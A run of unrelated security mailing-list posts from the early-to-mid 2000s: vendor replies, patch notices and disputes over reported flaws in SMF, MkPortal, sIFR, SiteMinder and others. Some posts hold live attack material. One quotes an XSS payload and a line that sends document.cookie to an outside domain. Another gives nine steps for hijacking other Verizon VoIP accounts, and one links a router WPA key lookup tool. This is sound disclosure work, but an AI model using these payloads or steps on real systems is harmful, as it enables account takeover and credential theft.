NESSUS ANDROID APP - stores login info in plain text
Nessus app for android version 1.0.1 The app allows user to save nessus server info IP/username/password. The app saves this info to /sdcard/servers.id This file can be viewed with notepad and password is right there in plain text. this means any app on the system can see that info and possibly transmit it to an attacker.
Re: Default key algorithm in Thomson and BT Home Hub routers
I've created an online lookup (no brute force) tool that lets you retrieve the WPA keys for speedtouch modems: http://www.nickkusters.com/articles/79/Online_SpeedTouch_WPA_Key_Lookup.aspx
Re: Lifetype 1.2.7 XSS Vulnerability
Fixed in 1.2.8. Trivial issue, right, and hardly worth reporting, or is there a more significant issue that I am missing?
Re: Re: heanet.dl.sourceforge.net hacked?
The problem is: md5sums and sizes on http://www.libpng.org/pub/png/libpng.html do not match sourceforge mirrors and ftp.simplesystems.org etc. libpng.org: 641193 bytes for libpng-1.2.27.tar.bz2 ftp.simplesystems.org and sourceforge: 804821 bytes
Re: PR07-38: XSS on sIFR
Unfortunately there's a bit of confusion, as Mike Davidson of mikeindustries.com is no longer the maintainer of sIFR, and he has not updated the sIFR page in a while. This issue was found and resolved on July 4th 2007, in version 2.0.3. It also appears that Internet Explorer is not vulnerable to this attack. More about 2.0.3 and the XSS issue here: http://novemberborn.net/sifr/2.0.3
Re: Simple Machine Forum - Private section/posts/info disclosure
This is the second SMF vulnerability announced in the recent weeks that appears to be caused by administrative misconfiguration rather than an error in SMF. I have tested this on a default SMF 1.1.4 test environment and it did not work for me. Given the fact that previous messages from h3llcode or others in your blackroots.it group make mention of the use of .htaccess for controlling access to sensitive areas, it seems likely that h3llcode has opened permissions to allow escalated privileges to others and is then attempting to control those privileges using .htaccess files. Either that or h3llcode is testing the advanced search from an account enabled with escalated privileges already. h3llcode, please create a default SMF 1.1.4 test environment and report back on your findings. If it can be duplicated in a properly configured SMF forum, I'm very interested in knowing about it. Thank you, Kevin Lynn, CISSP
Re: SiteMinder Agent: Cross Site Scripting
Would you explain in detail how this is a successful exploit? I ran https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0 against the current 6.0.5.11 SiteMinder Web Agent. This attempt is stopped with the following two errors in the Web Agent log. 1. Error. No redirect target found in namespace. 2. unable to process FCC parameters. Returning SmNoAction. SiteMinder only causes a redirect to smpwservices.fcc on certain conditions, it's not accessed directly, and it would not generate a URL with a query string that only includes SMAUTHREASON=. Or are you attempting to replace SMAUTHREASON= with SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0 in the query string during the normal process with something like burp proxy? I tested that as well, and the inserted code was ignored and didn't persist to the next step during the process.
Re: "BIND 9 DNS Cache Poisoning" by Amit Klein (Trusteer)
I don't exactly see how this is new "News" since Zalewski's paper on TCP sequence number analysis (which included analysis of versions of BIND): http://lcamtuf.coredump.cx/newtcp/ -ntn
Re: MkPortal Urlobox Cross Site Request Forgery
This is a bogus report. Only Administrators have perms to post URLs in the Urlobox. I think we can safely assume that an Admin is not going to hack his own website. -=DKC=- mkportal.it
Re: MkPortal Urlobox Cross Site Request Forgery
I was wrong about this issue in my previous post. Unofficial Solution: FIND in /mkportal/modules/urlobox/index.php: $message = preg_replace('/\[URL=(.+?)\](.+)\[\/URL\]/',$no_url,$message); $message = preg_replace('/\[IMG\](.+?)\[\/IMG\]/',$no_img,$message); REPLACE WITH: $message = preg_replace('/\[URL=(.+?)\](.+)\[\/URL\]/i',$no_url,$message); $message = preg_replace('/\[IMG\](.+?)\[\/IMG\]/i',$no_img,$message); -=DKC=-
Re: Re: Apple Remote Desktop root vulneravility
This is not so much a vulnerability as an oversight. Who's oversight is up to you, but if you run a process remotely as root, and it has a GUI, then the GUI will appear on the screen, as a root process. This usually involves a menubar, adn thereby access to System Preferences. An easy demonstration is using SSH to log into a box, sudo -s to get a root shell, and execute ANY program in the applications directory (open -a Safari). You'll get Safari and access to the menubar with the login window appearing as a hinderance. This isn't anything new, the guy's using RADMIND have been fighting it since 10.4 came out and redid the way the system handles the login window at startup. On the automated side, applicatiosn like iHook have created a very nice work around for this. At the ARD end, the lock screen function does this well enough. Its merely a matter of testing deployment on a machine you have physical access to before shoving it down to x-number of computers. This is something John Welch (bynkii.com) harped about this spring. Its shoddy design on many App Designers by not giving a proper remote installer or pkg file that can execute silently. Whether or not this is something Apple needs to fix, that's up for debate. They are not necessairly in the wrong here, regardless of how much it may appear to be an obvious security flaw. Maybe they should check to see if the LoginWindow is displayed before allowing a gui app to run with root priviledges, but after debating this issue enough i've come to the conclusion that Apple, the programmers, and the administrators, are all at fault at some level.
Re: Startpage <= 1.0 (cfgLanguage) Remote File Inclusion Vulnerability
I made this script a long time ago and actually I donĀ“t use it anymore (I use a newer version which is not ready for "the real world" yet). By accident I discovered this page when I showed someone how many hits you will get when you google on your own name. You say "Venedor Contacted, But No Response", but I haven't seen a mail about this, or it was disguised as spam. and I removed it. But I made a quick update (remove the language option) and placed it on my site (http://matthijs.draijer.org/download.php?id=35)
Re: Photocycle v1.0 - XSS
Patched within a couple hours of discovery. Download version 1.1. http://adambrown.info/p/tools/photocycle";>Photocycle homepage
Verizon Voicewing and Linksys PAP2-VN
Product: Verizon voicewing combined with Linksys PAP2-VN Reported by: Haavar Valeur Status: Vendor unwilling to address the problem Reported: Mar 15, 2006 I found a way it is possible to make and receive calls from other Verizon accounts. The problem is that Verizon publishes encrypted configuration files containing the username and password. These files are published through tftp and http, and are publicly readable. A vulnerability is created because the PAP2-VN adapter trusts the web server to give it the correct file. The PAP2 adapter accepts and decrypts configuration files for other accounts if they are available at the URI where the adapter expects to find it's configuration file. The following steps can be made by anyone with a PAP2-VN adapter to access random users accounts: 1) Create a subnet that you are able to isolate from the internet 2) Block all TFTP access from the subnet to the Internet. This will make the adapter failover to http (I did not bother to set up a tftp server). 3) Redirect all HTTP request made from the subnet to a web server you control (possible with e.g. iptables) 4) Connect the PAP2 adapter to the subnet and wait for the adapter to try to get the config file. 5) Look in the web server access log or tcpdump to find what URL the PAP2 tries to access on the web server 6) The URL should contain the MAC address of the PAP2. Try finding another valid mac by changing one of the least significant digits, and download the file from verizons web server. 7) Rename the file you downloaded to the filename the PAP2 tried to access and put it on the web server so the PAP2 will download this file. 8) The PAP2 will download and decrypt this file containing the account information of the other user and connect to the SIP server. 9) Now you can make and receive calls from another account This has been tested a PAP2-VN with firmware v2.0.10 and Verizon Voicewing, but could apply to other vendors using this adapter.
Re: Cross-site scripting vulnerability in CF 5.0
Something to note: The 'view admin log' feature in CF tends to cause stress on the CF process, and also blocks the log file during opening. So, It's generally a better (and safer, with this cross-site scripting problem that's been around for years) to view the logs file via a text viewer on the sytem. By default, it's c:\cfusion\log\*.log On Mon, 16 Dec 2002, KiLL CoLe wrote: > Cross-site scripting vulnerability in CF 5.0. This > issue was brought up to macromedia on July 22nd, 2002. > Macromedia issued a fix to me, but I have not seen the > fix available to the public. the coldfusion > administrator allows you to view your application log > via your web browser. Under certain conditions, it is > possible to remotely alter coldfusions application > log. take the following code: > > >SELECT * FROM Products >Where ProductId = #int(url.productid)# > > > if the INT function encounters a value that is not > numeric, it throws an exception and writes the value > that was passed to application.log. Should an > unsuspecting administrator view the log file via their > web browser, script could be executed. Analyze this > code: > if url.productid (from the above example) were passed > in as: > > > document.frame1.location="http://www.domain.com/index.cfm?stealcookie="; > + document.cookie > > this would enable an attacker to steal the value of > the coldfusion administrators cookie. Decrypting the > coldfusion admin's password is well documented, and > exposes a mild-moderate threat to server security. > > **NOTE: there are dozens of other functions that throw > exceptions similar to the INT function. > > __ > Do you Yahoo!? > Yahoo! Mail Plus - Powerful. Affordable. Sign up now. > http://mailplus.yahoo.com > >
Re: ZoneEdit Account Hijack Vulnerability
In-Reply-To: <000701c284d5$ccf1e2e0$[EMAIL PROTECTED]> > >The webmasters of this site were informed of this vulnerability on >05 November 2002. To date, no useable information on protecting >against this vulnerability has been received. > Matt and Paul were contacted on 05 November 2002 to notify them that a security review had been completed, and to please re-run their tests. No reply has yet been received. Erik Aronesty ZoneEdit CEO